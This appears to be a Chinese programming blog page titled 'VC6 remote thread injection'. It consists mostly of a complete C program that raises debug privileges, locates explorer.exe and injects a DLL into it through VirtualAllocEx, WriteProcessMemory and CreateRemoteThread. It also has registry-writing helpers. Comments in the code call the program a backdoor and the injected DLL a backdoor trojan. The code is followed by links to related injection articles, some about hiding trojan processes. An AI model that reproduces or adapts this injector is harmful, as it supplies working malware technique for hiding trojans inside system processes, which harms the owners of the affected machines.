VC6远程线程注入

最新推荐文章于 2022-12-09 17:11:44 发布
最新推荐文章于 2022-12-09 17:11:44 发布
阅读量397 收藏
点赞数
001 #include "stdafx.h" 
002 #include <windows.h> 
003 #include <Tlhelp32.h> 
004   
005 /** 
006  * 提升后门自身权限 
007  */
008 bool EnableDebugPriv(const char * name) 
009 { 
010     HANDLE hToken; 
011     TOKEN_PRIVILEGES tp; 
012     LUID luid; 
013     if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken)) return false; 
014     //获得进程本地唯一ID 
015     if(!LookupPrivilegeValue(NULL, name, &luid)) return false; 
016     tp.PrivilegeCount = 1; 
017     tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 
018     tp.Privileges[0].Luid = luid; 
019     //调整进程权限 
020     if(!AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) return false; 
021       
022     return true; 
023 } 
024 /** 
025  * 将dll注入某进程 
026  * @param DllFullPath 后门木马 
027  * @param dwRemoteProcessId 进程编号 
028  */
029 bool InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId) 
030 { 
031     HANDLE hRemoteProcess, hRemoteThread; 
032     if(!EnableDebugPriv(SE_DEBUG_NAME)) return false; 
033   
034     //打开目标进程 
035     if((hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwRemoteProcessId)) == NULL) return false; 
036       
037     char *pszLibFileRemote; 
038     pszLibFileRemote = (char *)VirtualAllocEx(hRemoteProcess, NULL, lstrlen(DllFullPath) + 1, MEM_COMMIT, PAGE_READWRITE); 
039     if(pszLibFileRemote == NULL) return false; 
040   
041     //把DLL的完整路径写入到内存 
042     if(WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (void*)DllFullPath, lstrlen(DllFullPath) + 1, NULL) == 0) return false; 
043   
044     //得到LoadLibraryA函数地址 
045     PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA"); 
046     if(pfnStartAddr == NULL) return false; 
047   
048     if((hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL)) == NULL) return false; 
049   
050     return true; 
051 } 
052 /** 
053  * 获取某进程编号 
054  * @param ProcessName 进程名 
055  * return 如果失败则返回0 
056  */
057 DWORD GetProcessID(char *ProcessName) 
058 { 
059     PROCESSENTRY32 pe32; 
060     pe32.dwSize = sizeof(pe32); 
061     //得到系统内所有进程快照 
062     HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 
063     if(hProcessSnap == INVALID_HANDLE_VALUE) return 0; 
064     //枚举列表中的第一个进程 
065     BOOL bProcess = Process32First(hProcessSnap, &pe32); 
066     while(bProcess) 
067     { 
068         if(strcmp(strupr(pe32.szExeFile), strupr(ProcessName)) == 0) 
069         //if(strcmp(pe32.szExeFile, ProcessName) == 0) 
070         { 
071             //return pe32.th32ParentProcessID; 
072             return pe32.th32ProcessID; 
073         } 
074         //继续查找下一个 
075         bProcess = Process32Next(hProcessSnap, &pe32); 
076     } 
077     CloseHandle(hProcessSnap); 
078   
079     return 0; 
080 } 
081 /** 
082  * 修改字符串类型键值 
083  */
084 BOOL CreateStringReg(HKEY hRoot,char *szSubKey,char* ValueName,char *Data) 
085 { 
086     HKEY hKey; 
087     //打开注册表键,不存在则创建它 
088     long lRet=RegCreateKeyEx(hRoot,szSubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL); 
089     if (lRet!=ERROR_SUCCESS) return false; 
090   
091     //修改注册表键值,没有则创建它 
092     lRet=RegSetValueEx(hKey,ValueName,0,REG_EXPAND_SZ,(BYTE*)Data,strlen(Data)); 
093     if (lRet!=ERROR_SUCCESS) return false; 
094   
095     RegCloseKey(hKey); 
096     return true; 
097 } 
098 /** 
099  * 用于修改数字类型键值 
100  */
101 BOOL CreateDWORDReg(HKEY hRoot,char *szSubKey,char* ValueName,DWORD Data) 
102 { 
103     HKEY hKey; 
104     //打开注册表键,不存在则创建它 
105     long lRet=RegCreateKeyEx(hRoot,szSubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL); 
106     if (lRet!=ERROR_SUCCESS) return false; 
107   
108     DWORD dwSize=sizeof(DWORD); 
109     //修改注册表键值,没有则创建它 
110     lRet=RegSetValueEx(hKey,ValueName,0,REG_DWORD,(BYTE*)&Data,dwSize); 
111     if (lRet!=ERROR_SUCCESS) return false; 
112   
113     RegCloseKey(hKey); 
114     return true; 
115 } 
116   
117   
118 int main(int argc, char* argv[]) 
119 { 
120     char DllPath[255]; 
121     //得到IE进程 
122     DWORD Pid=GetProcessID("EXPLORER.EXE"); 
123     //得到程序自身路径 
124     GetCurrentDirectory(sizeof(DllPath), DllPath); 
125     //得到DLL带路径文件名 
126     strcat(DllPath, " \\InjectDLL.dll"); 
127     //注入IE进程 
128     if(Pid) InjectDll(DllPath, Pid); 
129   
130     return 0; 
131 }
tix66
关注
专栏目录
VC++远程线程注入
01-25
一个具有很好学习价值的书籍;轻松理解VC++开发,和远程线程注入; 内涵hook编程,是制作外挂的基础必修课
远程线程注入新发展源代码,非常难得的,欢迎学习VC的朋友使用
12-22
远程线程注入新发展,有关线程注入的源代码,可以直接编译使用,VC6.0
vc实现无dll远程线程注入
sx1989827的专栏
02-10 3964
    最近看了些大虾的文章,蛮有感触的,在看到远程dll后没想到还有无dll的线程函数注入,呵呵,有意思啊,我自己也写了一个,很简单,messagebox的注入.    了解dll注入的一定知道,dll内的内容是要写到目标进程内存的,那么我们也推知我们要注入线程函数也是一定要写入目标进程内存的,包括函数内要用到的数据也是一样,我们可以把要用到的数据写到一个结构体里即可.还有要对我们在函数里
VC++ 实现线程注入
weixin_30470643的博客
05-29 150
在基于黑客软件、杀毒软件、系统应用软件开发过程中,需要使用一种方式:将外部DLL通过线程形式注入到其他进程中。这样的过程就叫注入线程或者叫线程注入。#include"stdafx.h" #include"windows.h" //==========定义一个代码结构,本例为一个对话框============ structMyData{c...
VC++远程注入动态库的实现(6-6)
hou09tian的博客
08-10 707
通过Module32First()和Module32Next()函数遍历“快照”中的所有模块。这两个函数的使用方法与“3.2.2 遍历进程并显示”中介绍的Process32First()与Process32Next()函数的用法类似。
VC 远程线程注入 不使用DLL 源码
07-30
总的来说,VC远程线程注入不使用DLL是一种高级的编程技巧,它要求开发者对操作系统底层工作原理有深入的理解,包括进程、线程内存管理和系统调用等方面的知识。通过这种方式,你可以实现一些自定义的跨进程通信和...
远程线程注入,dll注入,vc
10-19
远程线程注入和DLL注入是计算机编程中的一种高级技术,主要应用于系统监控、调试、插件扩展以及恶意软件中。本文将深入探讨这两种技术的概念、原理及其在VC++(Visual C++)环境中的实现。 首先,远程线程注入是指...
dllzhuru.rar_dll 注入_dll远程注入_vc 远程注入_远程注入
09-24
《DLL注入技术详解——基于VC的远程注入实践》 DLL(Dynamic Link Library)注入是一种常见的系统编程技术,常用于扩展程序功能、调试、监控或恶意攻击。本篇文章将深入探讨DLL注入的基本原理,并通过VC++实例,...
远程线程注入实现木马进程隐藏
05-05
在提供的文件"NT环境下进程隐藏的实现 - VC知识库文章.mht"中,可能详细介绍了如何在Windows NT环境下利用VC++进行远程线程注入的实践过程,包括代码示例和可能的注意事项。而"hidesrc"可能是包含实际注入代码的...
用VC++写的远程线程插入代码
修养生息,以得佳境
04-14 1555
#include#include #include #pragma comment(lib,"Shlwapi.lib")//参数结构 ; typedef struct _RemotePara{   DWORD dwLoadLibrary;  DWORD dwFreeLibrary;  DWORD dwGetProcAddress;}Rem
vc使用dll远程注入系统自带计算器程序
10-24
vc使用dll远程注入系统自带计算器程序,下载运行请修改相应的dll程序
几种dll注入VC++源码
09-27
各种时期的注入技术 hook lib .......远线程等等
内存注入模块3.1加强版
04-08
内存注入模块
赞!VC++编程创建远程线程式调用CALL_VirtualAllocEx_WriteProcessMemory_CreateRemoteThread_WaitForSingleObject
02-02 2137
16赞!VC++编程创建远程线程式调用CALL。 借箭源码:14.解密!远程CALL调用代码实现原理。 VirtualAllocEx 在指定进程里 申请一块内存 LPVOID WINAPI VirtualAllocEx(   __in      HANDLE hProcess, //进程句柄   __in_opt  LPVOID lpAddress, //指定分配的内存地址 N
C++远程线程注入Dll模块代码,全系统通用,超简单。
最新发布
WorryFree
12-09 795
C++远程线程注入Dll模块代码,全系统通用,超简单
线程注入、HOOK APIs(附VC6源码)
BeanJoy的专栏
01-13 9315
工作关系,想HOOK并修改一些API,使得不支持某些设备的第三方工具可以正常运行,因此花时间写了这么个工具。比如ReadFile时,某些设备不支持指定的缓存大小(如512KB),可以HOOK ReadFile,把缓存大小修改为更小,可能ReadFile就能正常工作,第三方工具也能正常使用。其实,只是想借工作这个契机,学习远程线程注入和HOOK API。工作上测试的设备和第三方工具运行在64位机
VC++远程注入动态库的实现(6-4)
hou09tian的博客
08-10 655
要将指定的动态库路径写入到进程的地址空间中,需要为该动态库路径分配地址空间。要分配地址空间,就需要知道要分配地址空间的大小。假设动态库文件与注入程序文件在同一文件夹下,即如果注入文件的绝对路径为“C:\1\2\inject.exe”,则动态库的绝对路径为“C:\1\2\myDll.dll”。分配地址空间的大小即为动态库绝对路径的长度,首先获取注入文件的绝对路径,之后将绝对路径中的“inject.exe”换成“myDll.dll”即可。
VC++远程注入动态库的实现(6-1)
hou09tian的博客
08-10 849
远程注入动态库,指的是在另外一个进程(远程进程)中创建导入动态库的线程远程线程)。要完成的功能都在被导入的动态库中实现。
VC++代码注入,实现对Tutorial的外挂控制
ldxicare的专栏
04-09 1221
代码注入3种方式: Ⅰ. Windows 钩子 Ⅱ. CreateRemoteThread 和 LoadLibrary 技术 Ⅲ.CreateRemoteThread和WriteProcessMemory技术 这里我我们使用第二种方式,通过动态加载dll实现代码注入。 第一步:创建Dll工程 HMODULE g_hModule = NULL; WCHAR srClassN
VC多线程编程入门指南
"VC线程编程是针对微软Visual C++环境下的多线程开发技术,适合初学者入门学习。在单线程程序中,长时间的任务会导致程序无响应,因此引入多线程编程来解决这个问题。多线程允许并发执行任务,提高程序的响应速度和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值